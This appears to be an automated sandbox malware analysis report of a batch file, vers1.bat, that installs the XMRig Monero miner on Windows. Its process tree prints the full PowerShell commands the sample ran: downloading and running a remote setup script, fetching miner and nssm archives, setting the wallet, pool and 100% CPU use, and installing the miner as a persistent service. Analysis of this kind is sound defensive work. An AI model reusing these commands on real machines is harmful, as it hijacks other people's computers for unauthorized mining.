xmrig | a84009aa12f35d93284297647c2714df7f5b0a04d2e0732c689740920ea1421f

Analysis

max time kernel
1199s
max time network
1192s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
25/06/2024, 16:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vers1.bat
Size

393B
MD5

ece9925dc634f1cc20e3fd7ff7a144bd
SHA1

8816112e72b7b64a668bf7214999d855a7e05bde
SHA256

a84009aa12f35d93284297647c2714df7f5b0a04d2e0732c689740920ea1421f
SHA512

bf80fdf5fa8c00a0ddb773bed073d33b67bf6189b87b803f6fea7071e49dfdeb86cf2142175d9287fbc7bcfd639c42d848e9331f8bc7e68dacaaa33901432243

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 54 IoCs

miner

resource	yara_rule
behavioral3/files/0x0007000000023514-203.dat	family_xmrig
behavioral3/files/0x0007000000023514-203.dat	xmrig
behavioral3/memory/1272-206-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-338-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-339-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-340-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-341-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-342-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-344-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-345-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-346-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-347-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-348-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-349-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-350-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-351-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-352-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-353-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-354-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-355-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-356-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-357-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-358-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-359-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-360-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-361-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-362-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-363-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-364-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-365-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-366-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-367-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-368-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-369-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-370-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-372-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-373-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-374-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-375-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-376-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-377-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-378-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-379-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-380-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-381-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-382-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-383-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-384-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-385-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-386-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-387-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-388-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-389-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/4512-390-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	4764	powershell.exe
19	4764	powershell.exe
78	4420	powershell.exe
82	1236	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
1272	xmrig.exe
4676	nssm.exe
2220	nssm.exe
3616	nssm.exe
2512	nssm.exe
960	nssm.exe
5084	nssm.exe
636	nssm.exe
4512	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
3	raw.githubusercontent.com
4	raw.githubusercontent.com
19	raw.githubusercontent.com
78	raw.githubusercontent.com
82	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1796	sc.exe
3832	sc.exe
2560	sc.exe
3552	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4432	powershell.exe
2052	powershell.exe
4756	powershell.exe
2736	powershell.exe
1796	powershell.exe
4764	powershell.exe
4420	powershell.exe
4308	powershell.exe
1388	powershell.exe
3364	powershell.exe
3536	powershell.exe
1236	powershell.exe
5084	powershell.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4476	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4548	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4764	powershell.exe
4764	powershell.exe
1352	chrome.exe
1352	chrome.exe
4420	powershell.exe
4420	powershell.exe
4420	powershell.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
1388	powershell.exe
1388	powershell.exe
1388	powershell.exe
4432	powershell.exe
4432	powershell.exe
4432	powershell.exe
2584	taskmgr.exe
2052	powershell.exe
2052	powershell.exe
2052	powershell.exe
2584	taskmgr.exe
3364	powershell.exe
3364	powershell.exe
3364	powershell.exe
5084	powershell.exe
5084	powershell.exe
5084	powershell.exe
4756	powershell.exe
4756	powershell.exe
2584	taskmgr.exe
4756	powershell.exe
3536	powershell.exe
3536	powershell.exe
3536	powershell.exe
4308	powershell.exe
4308	powershell.exe
4308	powershell.exe
2736	powershell.exe
2736	powershell.exe
2736	powershell.exe
2584	taskmgr.exe
1236	powershell.exe
1236	powershell.exe
1236	powershell.exe
2584	taskmgr.exe
1796	powershell.exe
1796	powershell.exe
1796	powershell.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2584	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeShutdownPrivilege	1352	chrome.exe
Token: SeCreatePagefilePrivilege	1352	chrome.exe
Token: SeShutdownPrivilege	1352	chrome.exe
Token: SeCreatePagefilePrivilege	1352	chrome.exe
Token: SeShutdownPrivilege	1352	chrome.exe
Token: SeCreatePagefilePrivilege	1352	chrome.exe
Token: SeDebugPrivilege	4548	taskkill.exe
Token: SeDebugPrivilege	4420	powershell.exe
Token: SeDebugPrivilege	2584	taskmgr.exe
Token: SeSystemProfilePrivilege	2584	taskmgr.exe
Token: SeCreateGlobalPrivilege	2584	taskmgr.exe
Token: SeDebugPrivilege	1388	powershell.exe
Token: SeDebugPrivilege	4432	powershell.exe
Token: SeDebugPrivilege	2052	powershell.exe
Token: SeDebugPrivilege	3364	powershell.exe
Token: SeDebugPrivilege	5084	powershell.exe
Token: SeDebugPrivilege	4756	powershell.exe
Token: SeDebugPrivilege	3536	powershell.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	1236	powershell.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeLockMemoryPrivilege	4512	xmrig.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
4512	xmrig.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
1352	chrome.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe
2584	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4180 wrote to memory of 4764	4180	cmd.exe	84
PID 4180 wrote to memory of 4764	4180	cmd.exe	84
PID 1352 wrote to memory of 4968	1352	chrome.exe	91
PID 1352 wrote to memory of 4968	1352	chrome.exe	91
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 1252	1352	chrome.exe	92
PID 1352 wrote to memory of 3496	1352	chrome.exe	93
PID 1352 wrote to memory of 3496	1352	chrome.exe	93
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94
PID 1352 wrote to memory of 2036	1352	chrome.exe	94

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\vers1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp30D4.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    PID:1476
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      PID:5036
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:1804
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:1692
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:4312
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:4828
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:3100
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:4908
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:1796
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3832
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4548
  - - C:\Windows\system32\timeout.exe
      timeout 5
      4⤵
      Delays execution with timeout.exe
      PID:4476
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4432
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:1272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      PID:1796
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2052
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:4388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3364
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Ejefcdnk\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4756
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3536
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1236
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1796
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:2560
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3552
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:4676
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:2220
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:3616
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:2512
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:960
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:5084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbb5e9ab58,0x7ffbb5e9ab68,0x7ffbb5e9ab78
  2⤵
  PID:4968
- C:\Program Files\Google\Chrome\Application\chrome.exe
